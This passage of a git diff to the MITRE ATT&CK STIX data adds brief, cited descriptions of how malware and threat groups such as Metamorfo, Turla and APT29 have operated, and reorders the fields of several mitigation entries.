2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has used raw TCP for C2.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--4bd30351-b64b-47cb-897b-951b76ca668b", + "type": "relationship", + "modified": "2020-10-21T17:10:53.776Z", + "created": "2020-10-21T17:10:53.776Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) has undergone regular technical improvements in an attempt to evade detection.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--f0894796-a4ed-48c4-94fc-7fc42175416d", + "type": "relationship", + "modified": "2020-10-21T17:32:34.297Z", + "created": "2020-10-21T17:32:34.297Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--ad7b6185-bdb1-4271-b139-2d71dd85c0d4", + "type": "relationship", + "modified": "2020-10-21T22:48:31.284Z", + "created": "2020-10-21T18:31:51.757Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) requires the user to double-click the executable to run the malicious HTA file.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--21cd565f-4cdc-46d6-95b3-32b2d618674e", + "type": "relationship", + "modified": "2020-10-21T18:31:51.770Z", + "created": "2020-10-21T18:31:51.770Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, \\Software\\Microsoft\\Internet Explorer\\notes.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--0d34095a-cfba-4040-865c-a585e841e90b", + "type": "relationship", + "modified": "2020-10-21T22:48:31.310Z", + "created": "2020-10-21T18:31:51.853Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "external_references": [ + { + "source_name": "Medium Metamorfo Apr 2020", + "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", + "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + }, + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has downloaded a zip file for execution on the system.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--68e18f32-aae3-4bd6-b8e5-6ec2ec3d4173", + "type": "relationship", + "modified": "2020-10-21T19:08:44.127Z", + "created": "2020-10-21T19:08:44.127Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "external_references": [ + { + "source_name": "Medium Metamorfo Apr 2020", + "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767", + "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020." + }, + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has a function to kill processes associated with defenses and can prevent certain processes from launching.(Citation: Medium Metamorfo Apr 2020)(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--9a9db72e-71ae-4e00-b723-434dd41855bc", + "type": "relationship", + "modified": "2020-10-21T22:48:31.430Z", + "created": "2020-10-21T19:08:44.149Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "source_name": "FireEye Metamorfo Apr 2018", + "url": "https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html", + "description": "Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) has been delivered to victims via emails containing malicious HTML attachments.(Citation: FireEye Metamorfo Apr 2018) ", + "relationship_type": "uses", + "id": "relationship--4852a801-3cd3-4a97-90ef-8cb5974c80d9", + "type": "relationship", + "modified": "2020-10-22T01:34:58.890Z", + "created": "2020-10-21T19:08:44.229Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "external_references": [ + { + "source_name": "Fortinet Metamorfo Feb 2020", + "url": "https://www.fortinet.com/blog/threat-research/another-metamorfo-variant-targeting-customers-of-financial-institutions", + "description": "Zhang, X.. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020." + } + ], + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) had used AutoIt to load and execute the DLL payload.(Citation: Fortinet Metamorfo Feb 2020) ", + "relationship_type": "uses", + "id": "relationship--79cb18f3-0640-4b9d-9e93-62e3300f99d8", + "type": "relationship", + "modified": "2020-10-21T19:08:44.247Z", + "created": "2020-10-21T19:08:44.247Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--84c1ecc6-e5a2-4e8a-bf4b-651a618e0053", + "target_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "external_references": [ + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + } + ], + "description": "[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: FireEye - Synful Knock)", + "relationship_type": "uses", + "id": "relationship--d3eec81c-8d8d-486d-919b-dc63a12555df", + "type": "relationship", + "modified": "2020-10-22T17:35:30.342Z", + "created": "2020-10-21T19:36:50.824Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--eedc01d5-95e6-4d21-bcd4-1121b1df4586", + "target_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", + "external_references": [ + { + "source_name": "Unit42 CookieMiner Jan 2019", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/", + "description": "Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved July 22, 2020." + } + ], + "description": "[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of \"Little Snitch\", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)", + "relationship_type": "uses", + "id": "relationship--a2c599c5-be26-4837-a613-b7d74446247c", + "type": "relationship", + "modified": "2020-10-22T01:50:12.849Z", + "created": "2020-10-22T01:50:12.849Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--78bb71be-92b4-46de-acd6-5f998fedf1cc", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "relationship_type": "mitigates", + "description": "This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.", + "id": "relationship--d06c7363-a7f6-43b1-8af8-9d3b9975160c", + "type": "relationship", + "modified": "2020-10-22T18:05:46.422Z", + "created": "2020-10-22T18:04:38.489Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "external_references": [ + { + "source_name": "FBI Flash FIN7 USB", + "url": "https://www.losangeles.va.gov/documents/MI-000120-MW.pdf", + "description": "Federal Bureau of Investigation, Cyber Division. (2020, March 26). FIN7 Cyber Actors Targeting US Businesses Through USB Keystroke Injection Attacks. Retrieved October 14, 2020." + }, + { + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators\u2019 New Tools and Techniques. Retrieved October 11, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", + "source_name": "FireEye FIN7 Oct 2019" + } + ], + "description": "[FIN7](https://attack.mitre.org/groups/G0046) has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)", + "relationship_type": "uses", + "id": "relationship--fe8004eb-df5b-43c5-bf5a-1cbe028e8663", + "type": "relationship", + "modified": "2020-10-22T18:47:28.621Z", + "created": "2020-10-22T18:45:48.529Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--1cec9319-743b-4840-bb65-431547bce82a", + "external_references": [ + { + "source_name": "PWC WellMess July 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020." + }, + { + "source_name": "PWC WellMess C2 August 2020", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html", + "description": "PWC. (2020, August 17). WellMess malware: analysis of its Command and Control (C2) server. Retrieved September 29, 2020." + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has created self-signed digital certificates to enable mutual TLS authentication for malware.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)", + "relationship_type": "uses", + "id": "relationship--3bd4bd69-b1f6-426a-a63f-b8107eb57f8e", + "type": "relationship", + "modified": "2020-10-22T19:06:15.622Z", + "created": "2020-10-22T19:06:15.622Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "external_references": [ + { + "source_name": "NSA NCSC Turla OilRig", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020." + }, + { + "source_name": "Recorded Future Turla Infra 2020", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020." + } + ], + "description": "[Turla](https://attack.mitre.org/groups/G0010) has used malware obtained after compromising other threat actors, such as [OilRig](https://attack.mitre.org/groups/G0049).(Citation: NSA NCSC Turla OilRig)(Citation: Recorded Future Turla Infra 2020)", + "relationship_type": "uses", + "id": "relationship--ba6536dd-2c36-4057-bae9-e71e1076e69b", + "type": "relationship", + "modified": "2020-10-22T20:24:01.354Z", + "created": "2020-10-22T20:24:01.354Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", + "external_references": [ + { + "source_name": "NSA NCSC Turla OilRig", + "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf", + "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020." + } + ], + "description": "[Turla](https://attack.mitre.org/groups/G0010) has used the VPS infrastructure of compromised Iranian threat actors.(Citation: NSA NCSC Turla OilRig)", + "relationship_type": "uses", + "id": "relationship--e424b236-8c54-482b-b390-a15345f5c35c", + "type": "relationship", + "modified": "2020-10-22T20:24:01.356Z", + "created": "2020-10-22T20:24:01.356Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2", + "external_references": [ + { + "source_name": "Recorded Future Turla Infra 2020", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020." + } + ], + "description": "[Turla](https://attack.mitre.org/groups/G0010) has frequently used compromised WordPress sites for C2 infrastructure.(Citation: Recorded Future Turla Infra 2020)", + "relationship_type": "uses", + "id": "relationship--01b5af07-512b-4b60-ba2d-5c185b80fb5f", + "type": "relationship", + "modified": "2020-10-22T20:25:26.534Z", + "created": "2020-10-22T20:25:26.534Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "external_references": [ + { + "source_name": "Recorded Future Turla Infra 2020", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020." + } + ], + "description": "[Turla](https://attack.mitre.org/groups/G0010) has used compromised servers as infrastructure.(Citation: Recorded Future Turla Infra 2020)", + "relationship_type": "uses", + "id": "relationship--65eac98e-82b8-4592-a121-bea99f80dc87", + "type": "relationship", + "modified": "2020-10-22T20:25:26.573Z", + "created": "2020-10-22T20:25:26.573Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "external_references": [ + { + "source_name": "Recorded Future Turla Infra 2020", + "url": "https://www.recordedfuture.com/turla-apt-infrastructure/", + "description": "Insikt Group. (2020, March 12). Swallowing the Snake\u2019s Tail: Tracking Turla Infrastructure. Retrieved October 20, 2020." + } + ], + "description": "[Turla](https://attack.mitre.org/groups/G0010) has developed its own unique malware for use in operations.(Citation: Recorded Future Turla Infra 2020)", + "relationship_type": "uses", + "id": "relationship--a8cfb738-65ac-4d5a-8ef7-d3a21eab02ea", + "type": "relationship", + "modified": "2020-10-22T20:25:26.594Z", + "created": "2020-10-22T20:25:26.594Z" + }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -204942,10 +228806,10 @@ "source_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "target_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "relationship_type": "revoked-by", - "id": "relationship--c93632b4-0a7a-4492-a0e2-d57cffe7ff64", + "id": "relationship--0536e9fb-2b02-43e4-b3e4-1191ed4b526d", "type": "relationship", - "modified": "2020-07-07T16:44:26.688Z", - "created": "2020-07-07T16:44:26.688Z" + "modified": "2020-10-23T15:04:40.254Z", + "created": "2020-10-23T15:04:40.254Z" }, { "id": "course-of-action--4f170666-7edb-4489-85c2-9affa28a72e0", @@ -205107,10 +228971,12 @@ "x_mitre_deprecated": true }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T16:32:21.854Z", + "modified": "2019-06-13T16:07:21.233Z", + "type": "course-of-action", + "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c", + "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", + "name": "Account Use Policies", "external_references": [ { "source_name": "mitre-attack", @@ -205118,12 +228984,10 @@ "url": "https://attack.mitre.org/mitigations/M1036" } ], - "name": "Account Use Policies", - "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.", - "id": "course-of-action--f9f9e6ef-bc0a-41ad-ba11-0924e5e84c4c", - "type": "course-of-action", - "modified": "2019-06-13T16:07:21.233Z", - "created": "2019-06-11T16:32:21.854Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0" }, { @@ -205440,10 +229304,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T17:06:14.029Z", + "modified": "2020-03-31T13:08:45.966Z", + "type": "course-of-action", + "id": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "name": "Audit", "external_references": [ { "source_name": "mitre-attack", @@ -205451,12 +229317,10 @@ "url": "https://attack.mitre.org/mitigations/M1047" } ], - "name": "Audit", - "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", - "id": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8", - "type": "course-of-action", - "modified": "2020-03-31T13:08:45.966Z", - "created": "2019-06-11T17:06:14.029Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.1" }, { @@ -205640,12 +229504,10 @@ "x_mitre_version": "1.0" }, { - "created": "2019-06-11T16:43:05.712Z", - "modified": "2019-06-11T16:43:05.712Z", - "type": "course-of-action", - "id": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46", - "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", - "name": "Behavior Prevention on Endpoint", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -205653,10 +229515,12 @@ "url": "https://attack.mitre.org/mitigations/M1040" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "id": "course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46", + "type": "course-of-action", + "modified": "2019-06-11T16:43:05.712Z", + "created": "2019-06-11T16:43:05.712Z", "x_mitre_version": "1.0" }, { @@ -205706,10 +229570,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T17:02:36.984Z", + "modified": "2020-05-19T12:28:50.603Z", + "type": "course-of-action", + "id": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", + "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", + "name": "Boot Integrity", "external_references": [ { "source_name": "mitre-attack", @@ -205717,12 +229583,10 @@ "url": "https://attack.mitre.org/mitigations/M1046" } ], - "name": "Boot Integrity", - "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.", - "id": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb", - "type": "course-of-action", - "modified": "2020-05-19T12:28:50.603Z", - "created": "2019-06-11T17:02:36.984Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0" }, { @@ -206344,10 +230208,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T16:47:12.859Z", + "modified": "2020-03-31T13:09:22.442Z", + "type": "course-of-action", + "id": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "name": "Credential Access Protection", "external_references": [ { "source_name": "mitre-attack", @@ -206355,12 +230221,10 @@ "url": "https://attack.mitre.org/mitigations/M1043" } ], - "name": "Credential Access Protection", - "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", - "id": "course-of-action--49c06d54-9002-491d-9147-8efb537fbd26", - "type": "course-of-action", - "modified": "2020-03-31T13:09:22.442Z", - "created": "2019-06-11T16:47:12.859Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.1" }, { @@ -207371,16 +231235,16 @@ "url": "https://attack.mitre.org/mitigations/T1482" }, { - "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.", - "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", - "source_name": "Harmj0y Domain Trusts" + "source_name": "Harmj0y Domain Trusts", + "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019." } ], "description": "Map the trusts within existing domains/forests and keep trust relationships to a minimum. Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts)", "name": "Domain Trust Discovery Mitigation", "id": "course-of-action--159b4ee4-8fa1-44a5-b095-2973f3c7e25e", "type": "course-of-action", - "modified": "2019-07-24T19:14:03.948Z", + "modified": "2020-09-17T18:26:17.815Z", "created": "2019-02-15T13:04:25.150Z", "x_mitre_deprecated": true, "x_mitre_version": "1.0" @@ -207596,10 +231460,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T16:40:14.543Z", + "modified": "2019-06-11T16:40:14.543Z", + "type": "course-of-action", + "id": "course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6", + "description": "Prevent modification of environment variables by unauthorized users and groups.", + "name": "Environment Variable Permissions", "external_references": [ { "source_name": "mitre-attack", @@ -207607,12 +231473,10 @@ "url": "https://attack.mitre.org/mitigations/M1039" } ], - "name": "Environment Variable Permissions", - "description": "Prevent modification of environment variables by unauthorized users and groups.", - "id": "course-of-action--609191bf-7d06-40e4-b1f8-9e11eb3ff8a6", - "type": "course-of-action", - "modified": "2019-06-11T16:40:14.543Z", - "created": "2019-06-11T16:40:14.543Z", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0" }, { @@ -209225,10 +233089,12 @@ "x_mitre_version": "1.0" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "created": "2019-06-11T16:26:52.202Z", + "modified": "2019-06-11T16:26:52.202Z", + "type": "course-of-action", + "id": "course-of-action--23843cff-f7b9-4659-a7b7-713ef347f547", + "description": "Block users or groups from installing unapproved software.", + 